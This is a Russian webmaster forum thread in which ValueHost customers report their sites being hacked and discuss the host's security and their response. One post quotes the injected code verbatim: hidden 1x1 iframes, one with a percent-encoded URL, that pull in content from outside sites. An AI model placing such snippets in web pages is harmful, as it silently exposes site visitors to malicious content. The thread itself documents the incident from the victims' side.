Важно! Владельцам сайтов на Валюе

1 2345 6
E
На сайте с 11.06.2006
Offline
49
#21

есть два ака на валуе, подтверждаю оба были вскрыты и пытались быть нашпигованы тем про что здесь пишут (причем именно сегодня 29 числа)

p.s php-шные индексные файлы вроде не пострадали

New_Angel
На сайте с 14.12.2004
Offline
151
#22

Сайты одного из моих клиентов, таким же макаром пострадали, переношу на другой хост.

Denis Kozminykh! skype: new_angel_gw, tel: +7(495) 215-07-52, newangel@me.com
Редько Владимир
На сайте с 02.11.2004
Offline
75
#23
ekwatt:
есть два ака на валуе, подтверждаю оба были вскрыты и пытались быть нашпигованы тем про что здесь пишут (причем именно сегодня 29 числа)
p.s php-шные индексные файлы вроде не пострадали

Подтверждаю. Зафиксировал факт взлома на сайте без ЦМС

D
На сайте с 20.05.2001
Offline
312
#24

Может это не взлом, а сам валуй продает трафик под ботнеты :)

The WishMaster
На сайте с 29.09.2005
Offline
2542
#25
Art-Host:
Кстати, может быть и value во всем виноват

Скорее всего, так оно и есть. Потому что подобные ситуации появляются каждые несколько месяцев, нормальный и честный хостинг давно бы позакрывал все дыры. Или себя закрыл бы:)

Пешу текста дешыго! Тематики - туризм, СЕО, творчество, кулинария, шизотерика :)
Paco
На сайте с 14.04.2005
Offline
27
#26

Вчера на своих 4 сайтах расположенных на валуе были замечены эти же скрипты в IFRAME'ах. В срочном порядке сменил все пароли и почистил файлы.

Посмотрим что будет через пару дней.

До этого файлы чистил, но скрипты, через пару дней, появлялись опять.

[Удален]
#27

Такая же фигня

Причём есть сайт на хтмл, есть на пхп.

И причём разные аккаунты!!! И всёравно на всех сайтах такоепоявилось!

недавно тока вычистил, пароли поменял, и вот опять

"<iframe src="http://www.counter-pr.info/stds_1_1beta/go.php?sid=1" width=1 height=1></iframe><html>

<!--iframe src="http://%61%6c%65%72%74%2d%63%61.%63%6f%6d/%63%6f%75%6e%74%65%72%31/%69%6e%64%65%78.%70%68%70" width=1 height=1></iframe-->"

Полный пипец.

Написал в сапорт, жду ответа, так как никаких скриптов не использую на сайтах.

dRiveR.dLL
На сайте с 25.09.2006
Offline
79
#28

<iframe>.. повезло вам..

Нам вот закидывали крайне неприятный бэкдор: общедоступная страничка, при открытии которой, любой пользователь мог изменить права доступа на любой файл, удалить его или закачать свой. На другой сайт вставили пункт меню "чат", причем настолько аккуратно вставили (меню с графическими элементами), что было очевидно, что сделал это человек, а не скрипт.

И это все косяки Valuehost и только их.

[Удален]
#29

сапорт сказал ведётся разбирательство... =)

кстат ичтобы от них съехать если домены через них регили - надо заплатить)

По повоу статьи http://dp.ru/spb/news/incident/2006/10/20/106165/, что база продаётся - я несколько раз пароли менял на нескольких акках, и всёравно через некоторое время появлялся "лишний" код - сответственно ломают их постоянно.

Drow - улыбнуло =))

K
На сайте с 31.01.2001
Offline
737
#30
findtour:
кстати чтобы от них съехать если домены через них регили - надо заплатить)

Или заключить договор напрямую с регистратором (для валуя r01.ru или посмотреть в whois своего домена).

Выделенные полосы в Москве (http://www.probkovorot.info) привели к снижению скорости до 23%.
1 2345 6

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий